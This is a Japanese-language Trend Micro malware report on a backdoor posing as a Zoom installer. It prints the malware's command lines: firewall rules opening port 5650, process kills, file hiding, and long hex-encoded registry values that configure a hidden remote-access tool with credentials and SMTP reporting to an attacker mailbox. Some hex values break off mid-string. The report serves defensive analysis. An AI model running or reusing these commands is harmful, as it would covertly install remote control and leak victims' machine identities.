Trend Micro Security

Backdoor.Win32.ZAPIZ.THDBABO

2020年5月20日
 別名:

HEUR:Trojan.Win32.Generic (Kaspersky)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:


  • マルウェアタイプ: バックドア型
  • 破壊活動の有無: なし
  • 暗号化:  
  • 感染報告の有無: はい

  概要


マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 16,156,300 bytes
タイプ EXE
メモリ常駐 はい
発見日 2020年5月20日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • cmd.exe /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svch\xc3\xaest.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svch\xc3\xaest.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svch\xc3\xaest.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svch\xc3\xaest.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svch\xc3\xaest.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
  • "%User Temp%\Zoom Meetings\5.0.1\setup.exe"
  • %User Temp%\Zoom Meetings\5.0.1\setup.exe
  • %User Temp%\Zoom Meetings\5.0.1\reg.exe shortcut "%Application Data%\Zoom\bin\Zoom.exe" "~$folder.desktop$" "Start Zoom"
  • "%System%\cmd.exe" /c attrib -h -s -r "%User Temp%\Zoom Meetings\5.0.1\*.*"
  • "%System%\cmd.exe" /c RMDIR /s/q "%User Temp%\Zoom Meetings"
  • taskkill /f /im rutserv.exe
  • taskkill /f /im rfusclient.exe
  • reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
  • netsh firewall add portopening TCP 5650 "Open Port 5650"
  • netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650
  • "%System%\drivers\install.exe"
  • %System%\PING.EXE ping 127.0.0.1
  • .\Installer.exe
  • %User Temp%\7zS8C40EAE9\Installer.exe /addfwexception --bin_home="%Application Data%\Zoom\bin"
  • %Application Data%\Zoom\bin\Zoom.exe %Application Data%\Zoom\bin\Zoom.exe
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b46344332364244352d423335302d344635382d414445442d4131364641363137353634467d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f727440636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433326a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f727440636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b43373538414534332d303942442d344144392d393441332d4437374242443042464634417d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e333c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34333637302e393835393532363936383c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
  • cmd.exe /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Certificates /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465658463365473971515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a4234543152424d3031715558684f656b3031546b526b59555a334d486c505645457a436b31715258684f656b3031546b526b5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a307444515646465158685053457071556b5671643356776244426d55455261527a5678436d30724e6d745152314a5159566447546d314765556b344d554a554e45567965464a545744685061574a465669396a4c304e7863474a3257485a71647a4a7065576c4964334a755957567957553173596a6846646c634b5154685a5757355461334654576d4a4e656d70575655645555473149563356454d6b643054475a365630743161545235555770784e445646625764434d584a3253314a51646c5a49596c70734d6b5a56513070495a6770344e33564f5a6d4e544c31465553326c4e6448553165584a73566d49354f57466a5a5570535a46465a6332597a4e6d6f7652546c544b3038304d334654546e64534d564972566b4e4a56337057516e705357564e33436a4e4553457442535373356154646d59544d79536b784f52544e7164326c68625846424f4452534f474977523273354b793968646c6c76595442724c3064554e6d70565257705a614768344d4868434f5449725a456f4b5758466e633046594f574a45646e4d775a58647163304645596c6b785332524c517a6c7059585a4962304659636c513452324a73654777314f484a5665565a50616a4a74555863765a584e355a56644256566f336477707555556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516d464257474672645846786145464562336475526a4e345131466c56554972617a466f527a4935436d565459697478616a5a4252584a4f6547704b62573170536a646c4f5759354e58525755466b72654864334e476b794b31684b574656484d6e5a4f525552344e57786d56305652623235335a7a51345657316154566b4b556c4e595230786e526d517954576c6e61464645526e68774f46683663557451575870565657784b553235586446567357445531626b347a536e707a4e53747757467061556d314b576b5a32536e52475a5339695241707a51315657654452614f4851324f554e524e5856314d307048596b4a7054573872516b343452575a456458424d534670716157744c516c46695532526e52576434643064304e53396d636d30314c32733457473934436b4e7864585a7156445a3155555a32513064755a4459334b3231495243397a5a586778627a4e554e58645156334e4b536c42725a3170484d306c695a30467756307047566e6c704f584a5556566c71654851785555634b654531434f5451355747566f4e446c6d576a525a54445577616a4e4f656d685a656b35474e6c5934625864424c326873576d3933563239504e30673364444e6d54325935523073765132594b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652524555305932314f52564e51517a5a745746494b4f44684f61324a746357493363564534576b553563466c564d6c6c595357703656555a515a314e32526b5a4b5a6e6332536e4e5357446c364f457478624855355a5374515247464d53306c6d5133566b63445a305a777035566e5a33557a6c5a5248686f6157524c5533424b62484e36543035575556704e4b316c6b59545251575745776443394f575845325447704b51303979616d74545955464956335534634555724f56566b64473159436c6c5755556c72
  • cmd.exe /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720" /f
  • Zoom.exe --action=uploadFeedback
  • %Application Data%\Zoom\bin\Zoom.exe %Application Data%\Zoom\bin\Zoom.exe --action=preload --runaszvideo=TRUE
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b46344332364244352d423335302d344635382d414445442d4131364641363137353634467d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f727440636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433326a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f727440636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b43373538414534332d303942442d344144392d393441332d4437374242443042464634417d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e333c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f646
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34333637302e393835393532363936383c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
  • %System%\reg.exe REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Certificates /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465658463365473971515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a4234543152424d3031715558684f656b3031546b526b59555a334d486c505645457a436b31715258684f656b3031546b526b5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a307444515646465158685053457071556b56